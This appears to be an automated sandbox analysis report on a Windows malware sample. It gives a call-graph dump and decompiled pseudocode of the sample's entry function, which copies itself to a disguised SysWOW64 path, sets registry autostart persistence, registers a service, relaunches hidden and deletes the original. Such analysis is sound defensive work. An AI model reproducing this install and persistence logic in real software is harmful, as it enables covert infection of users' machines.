40f39f closesocket 15622->15623 15623->15616 15624->15623 15625 40f403 ioctlsocket 15624->15625 15627 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 15625->15627 15627->15616 15629 407dc8 InterlockedExchange 15628->15629 15630 407dc0 Sleep 15629->15630 15631 407dd4 15629->15631 15630->15629 15631->15515 15631->15516 15633 40e184 15632->15633 15634 40e2e4 15633->15634 15635 40e223 15633->15635 15648 40dfe2 15633->15648 15634->15543 15635->15634 15637 40dfe2 8 API calls 15635->15637 15641 40e23c 15637->15641 15638 40e1be 15638->15635 15639 40dbcf 3 API calls 15638->15639 15642 40e1d6 15639->15642 15640 40e21a CloseHandle 15640->15635 15641->15634 15652 40e095 RegCreateKeyExA 15641->15652 15642->15635 15642->15640 15643 40e1f9 WriteFile 15642->15643 15643->15640 15645 40e213 15643->15645 15645->15640 15646 40e2a3 15646->15634 15647 40e095 4 API calls 15646->15647 15647->15634 15649 40dffc 15648->15649 15651 40e024 15648->15651 15650 40db2e 8 API calls 15649->15650 15649->15651 15650->15651 15651->15638 15653 40e172 15652->15653 15656 40e0c0 15652->15656 15653->15646 15654 40e13d 15655 40e14e RegDeleteValueA RegCloseKey 15654->15655 15655->15653 15656->15654 15657 40e115 RegSetValueExA 15656->15657 15657->15654 15657->15656 15659 403122 InterlockedExchange 15658->15659 15660 40312e 15659->15660 15661 40310f GetTickCount 15659->15661 15660->15560 15661->15660 15662 40311a Sleep 15661->15662 15662->15659 15664 40f04e 4 API calls 15663->15664 15667 403a83 15664->15667 15665 403ac1 15665->15564 15665->15567 15666 403be6 15670 40ec2e codecvt 4 API calls 15666->15670 15667->15665 15669 403bc0 15667->15669 15671 403b66 lstrlenA 15667->15671 15668 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15668->15669 15669->15666 15669->15668 15670->15665 15671->15665 15671->15667 15672->15582 15673->15579 15675 402419 4 API calls 15674->15675 15676 4024b6 15675->15676 15676->15600 15678 40dd79 lstrlenA 15677->15678 15678->15042 14594 e30920 TerminateProcess 14595 e30005 14600 e3092b GetPEB 14595->14600 14597 e30030 14602 e3003c 14597->14602 14601 e30972 14600->14601 14601->14597 14603 e30049 14602->14603 14617 e30e0f SetErrorMode SetErrorMode 14603->14617 14608 e30265 14609 e302ce VirtualProtect 14608->14609 14611 e3030b 14609->14611 14610 e30439 VirtualFree 14615 e305f4 LoadLibraryA 14610->14615 14616 e304be 14610->14616 14611->14610 14612 e304e3 LoadLibraryA 14612->14616 14614 e308c7 14615->14614 14616->14612 14616->14615 14618 e30223 14617->14618 14619 e30d90 14618->14619 14620 e30dad 14619->14620 14621 e30dbb GetPEB 14620->14621 14622 e30238 VirtualAlloc 14620->14622 14621->14622 14622->14608

                                                                                Executed Functions

                                                                                Function 00409A6B Relevance: 102.3, APIs: 48, Strings: 10, Instructions: 799stringsleepregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8; // 0x43
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x109a0;
							if(_t239 -  *0x4133d0 < 0x109a0) {
								L131:
								Sleep(0x1a90);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64); // executed
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00("htdzdeug",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08("C:\Users\hardz\Desktop\file.exe",  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x61616161;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x61616161);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x61040108;
												 *0x412180 = 0x61040108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}





















































































                                                                                0x00409a7f
                                                                                0x00409a83
                                                                                0x00409a8a
                                                                                0x00409a90
                                                                                0x00409a97
                                                                                0x00409a9d
                                                                                0x0040a3cc
                                                                                0x0040a3d2
                                                                                0x0040a41c
                                                                                0x0040a42c
                                                                                0x0040a43a
                                                                                0x0040a440
                                                                                0x0040a448
                                                                                0x0040a452
                                                                                0x0040a45a
                                                                                0x0040a469
                                                                                0x0040a46b
                                                                                0x0040a470
                                                                                0x0040a475
                                                                                0x0040a47a
                                                                                0x0040a48a
                                                                                0x0040a48c
                                                                                0x0040a497
                                                                                0x0040a497
                                                                                0x0040a49d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a49f
                                                                                0x0040a4a7
                                                                                0x0040a4ac
                                                                                0x0040a4be
                                                                                0x0040a4c3
                                                                                0x00000000
                                                                                0x0040a4c3
                                                                                0x0040a4ae
                                                                                0x0040a4ae
                                                                                0x0040a4b3
                                                                                0x0040a4b5
                                                                                0x0040a4b9
                                                                                0x0040a4b9
                                                                                0x00000000
                                                                                0x0040a4b5
                                                                                0x0040a497
                                                                                0x0040a3da
                                                                                0x0040a406
                                                                                0x0040a407
                                                                                0x0040a409
                                                                                0x0040a40b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3e8
                                                                                0x0040a3eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3ed
                                                                                0x0040a3f3
                                                                                0x0040a3f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3f8
                                                                                0x0040a3f8
                                                                                0x0040a3f8
                                                                                0x0040a400
                                                                                0x0040a400
                                                                                0x0040a414
                                                                                0x0040a419
                                                                                0x00000000
                                                                                0x00409aa3
                                                                                0x00409ab0
                                                                                0x00409ac2
                                                                                0x00409ac4
                                                                                0x00409ac4
                                                                                0x00409ad1
                                                                                0x00409ae1
                                                                                0x00409aef
                                                                                0x00409af4
                                                                                0x00409af9
                                                                                0x00409afb
                                                                                0x00409afb
                                                                                0x00409af9
                                                                                0x00409afd
                                                                                0x00409b14
                                                                                0x00409b1a
                                                                                0x00409b26
                                                                                0x00409b2b
                                                                                0x00409b33
                                                                                0x00409b36
                                                                                0x00409b3b
                                                                                0x00409b41
                                                                                0x00409c26
                                                                                0x00409c2b
                                                                                0x00409c2e
                                                                                0x00409c33
                                                                                0x0040a1de
                                                                                0x0040a1e4
                                                                                0x0040a1fd
                                                                                0x0040a211
                                                                                0x0040a214
                                                                                0x0040a219
                                                                                0x0040a21c
                                                                                0x0040a21f
                                                                                0x0040a2e2
                                                                                0x0040a305
                                                                                0x0040a308
                                                                                0x0040a30d
                                                                                0x0040a310
                                                                                0x0040a313
                                                                                0x0040a35a
                                                                                0x0040a35a
                                                                                0x0040a35f
                                                                                0x0040a361
                                                                                0x0040a3c2
                                                                                0x00409c05
                                                                                0x00409c06
                                                                                0x00409c06
                                                                                0x0040a363
                                                                                0x0040a369
                                                                                0x0040a397
                                                                                0x0040a397
                                                                                0x0040a39d
                                                                                0x0040a3a3
                                                                                0x0040a3aa
                                                                                0x0040a3b1
                                                                                0x0040a3b4
                                                                                0x0040a3b7
                                                                                0x00000000
                                                                                0x0040a3b7
                                                                                0x0040a36b
                                                                                0x0040a371
                                                                                0x0040a374
                                                                                0x0040a374
                                                                                0x0040a376
                                                                                0x0040a377
                                                                                0x0040a377
                                                                                0x0040a37d
                                                                                0x0040a380
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a38e
                                                                                0x0040a394
                                                                                0x00000000
                                                                                0x0040a394
                                                                                0x0040a318
                                                                                0x0040a31e
                                                                                0x0040a324
                                                                                0x0040a325
                                                                                0x0040a327
                                                                                0x0040a339
                                                                                0x0040a33b
                                                                                0x0040a33d
                                                                                0x0040a340
                                                                                0x0040a344
                                                                                0x0040a344
                                                                                0x0040a34c
                                                                                0x0040a351
                                                                                0x0040a354
                                                                                0x00000000
                                                                                0x0040a354
                                                                                0x0040a329
                                                                                0x0040a32b
                                                                                0x0040a32e
                                                                                0x0040a32e
                                                                                0x0040a330
                                                                                0x0040a331
                                                                                0x0040a331
                                                                                0x0040a337
                                                                                0x0040a337
                                                                                0x00000000
                                                                                0x0040a337
                                                                                0x0040a228
                                                                                0x0040a22b
                                                                                0x0040a231
                                                                                0x0040a234
                                                                                0x0040a237
                                                                                0x0040a27a
                                                                                0x0040a280
                                                                                0x0040a281
                                                                                0x0040a283
                                                                                0x0040a28e
                                                                                0x0040a28e
                                                                                0x0040a28e
                                                                                0x0040a291
                                                                                0x0040a294
                                                                                0x0040a297
                                                                                0x0040a2a5
                                                                                0x0040a2ad
                                                                                0x0040a2b4
                                                                                0x0040a2b4
                                                                                0x0040a2b7
                                                                                0x0040a2b7
                                                                                0x0040a2bd
                                                                                0x0040a2d0
                                                                                0x0040a2d5
                                                                                0x0040a2d5
                                                                                0x0040a2d8
                                                                                0x00000000
                                                                                0x0040a2d8
                                                                                0x0040a242
                                                                                0x0040a245
                                                                                0x0040a24b
                                                                                0x0040a24c
                                                                                0x0040a24e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a253
                                                                                0x0040a264
                                                                                0x0040a26c
                                                                                0x00000000
                                                                                0x0040a26c
                                                                                0x00409c39
                                                                                0x00409c3f
                                                                                0x0040a167
                                                                                0x0040a183
                                                                                0x0040a190
                                                                                0x0040a196
                                                                                0x0040a198
                                                                                0x0040a198
                                                                                0x0040a1a2
                                                                                0x0040a1b3
                                                                                0x0040a1b6
                                                                                0x0040a1bc
                                                                                0x0040a1bf
                                                                                0x0040a1c7
                                                                                0x0040a1cc
                                                                                0x0040a1cc
                                                                                0x0040a1bf
                                                                                0x0040a1a2
                                                                                0x00000000
                                                                                0x00409c54
                                                                                0x00409c56
                                                                                0x00409c5b
                                                                                0x00409c62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409c74
                                                                                0x00409c79
                                                                                0x00409c7c
                                                                                0x00409c81
                                                                                0x00000000
                                                                                0x00409c90
                                                                                0x00409c94
                                                                                0x00409c97
                                                                                0x00409c9a
                                                                                0x00409e3e
                                                                                0x00409e3e
                                                                                0x00409e42
                                                                                0x0040a155
                                                                                0x0040a158
                                                                                0x0040a15d
                                                                                0x0040a161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a161
                                                                                0x00409e66
                                                                                0x00409e6b
                                                                                0x00409e75
                                                                                0x00409e77
                                                                                0x0040a14a
                                                                                0x0040a14d
                                                                                0x0040a152
                                                                                0x00000000
                                                                                0x0040a152
                                                                                0x00409e98
                                                                                0x00409e9d
                                                                                0x00409ea0
                                                                                0x00409ea2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409eab
                                                                                0x00409eb0
                                                                                0x00409ec1
                                                                                0x00409ec8
                                                                                0x00409ed5
                                                                                0x00409edb
                                                                                0x00409ee3
                                                                                0x00409ee4
                                                                                0x00409ee8
                                                                                0x00409eeb
                                                                                0x00409ef2
                                                                                0x00409ef9
                                                                                0x00409efc
                                                                                0x00409efd
                                                                                0x00409f03
                                                                                0x00409f03
                                                                                0x00409f08
                                                                                0x00409f09
                                                                                0x00409f0e
                                                                                0x00409f11
                                                                                0x00409f2d
                                                                                0x00409f32
                                                                                0x00409f3b
                                                                                0x00409f41
                                                                                0x00409f44
                                                                                0x00409f46
                                                                                0x00409f4b
                                                                                0x00409f4b
                                                                                0x00409f67
                                                                                0x00409f6a
                                                                                0x00409f6a
                                                                                0x00409f73
                                                                                0x00409f82
                                                                                0x00409f8e
                                                                                0x00409f98
                                                                                0x00409f9d
                                                                                0x00409fb4
                                                                                0x00409fba
                                                                                0x00409fbc
                                                                                0x00409fc2
                                                                                0x00409fc9
                                                                                0x00409fcf
                                                                                0x00409fd2
                                                                                0x00409fd4
                                                                                0x00409fda
                                                                                0x00409fda
                                                                                0x00409fdd
                                                                                0x00409fe1
                                                                                0x00409fe7
                                                                                0x00409feb
                                                                                0x00409ff1
                                                                                0x00409ff4
                                                                                0x00409ff8
                                                                                0x00409ffb
                                                                                0x00409ffe
                                                                                0x0040a004
                                                                                0x0040a007
                                                                                0x0040a010
                                                                                0x0040a025
                                                                                0x0040a038
                                                                                0x0040a041
                                                                                0x0040a046
                                                                                0x0040a049
                                                                                0x0040a050
                                                                                0x0040a05e
                                                                                0x0040a05e
                                                                                0x0040a072
                                                                                0x0040a078
                                                                                0x0040a07f
                                                                                0x0040a08d
                                                                                0x0040a08d
                                                                                0x0040a093
                                                                                0x0040a093
                                                                                0x0040a007
                                                                                0x00409feb
                                                                                0x00409fe1
                                                                                0x0040a09a
                                                                                0x0040a09d
                                                                                0x0040a09f
                                                                                0x0040a0a2
                                                                                0x0040a0b6
                                                                                0x0040a0de
                                                                                0x0040a0e7
                                                                                0x0040a0ec
                                                                                0x0040a0fd
                                                                                0x0040a0fd
                                                                                0x0040a0a2
                                                                                0x0040a120
                                                                                0x0040a126
                                                                                0x0040a128
                                                                                0x0040a131
                                                                                0x0040a137
                                                                                0x0040a137
                                                                                0x0040a13a
                                                                                0x0040a13e
                                                                                0x0040a140
                                                                                0x0040a143
                                                                                0x0040a145
                                                                                0x0040a145
                                                                                0x0040a143
                                                                                0x00000000
                                                                                0x0040a13e
                                                                                0x00409ef4
                                                                                0x00409ef7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ef7
                                                                                0x00409cac
                                                                                0x00409cb2
                                                                                0x00409cb4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409cd5
                                                                                0x00409cda
                                                                                0x00409cdf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ce9
                                                                                0x00409cec
                                                                                0x00409d58
                                                                                0x00409d59
                                                                                0x00409d64
                                                                                0x00409d65
                                                                                0x00409d6a
                                                                                0x00409d7a
                                                                                0x00409d8b
                                                                                0x00409d9d
                                                                                0x00409da3
                                                                                0x00409da3
                                                                                0x00000000
                                                                                0x00409cf6
                                                                                0x00409cf6
                                                                                0x00409cfc
                                                                                0x00409cff
                                                                                0x00409cff
                                                                                0x00409d01
                                                                                0x00409d02
                                                                                0x00409d06
                                                                                0x00409d0a
                                                                                0x00409d16
                                                                                0x00409d16
                                                                                0x00409d17
                                                                                0x00409d1b
                                                                                0x00409d2f
                                                                                0x00409d2f
                                                                                0x00409d3e
                                                                                0x00409d41
                                                                                0x00409d49
                                                                                0x00409d4f
                                                                                0x00409d52
                                                                                0x00409da5
                                                                                0x00409da8
                                                                                0x00409db6
                                                                                0x00409db6
                                                                                0x00409db0
                                                                                0x00409db0
                                                                                0x00409db0
                                                                                0x00409db7
                                                                                0x00409db8
                                                                                0x00409dbf
                                                                                0x00409dc3
                                                                                0x00409dca
                                                                                0x00409dd1
                                                                                0x00409dd2
                                                                                0x00409dd7
                                                                                0x00409ddc
                                                                                0x00409e21
                                                                                0x00409e26
                                                                                0x00409e29
                                                                                0x00000000
                                                                                0x00409dde
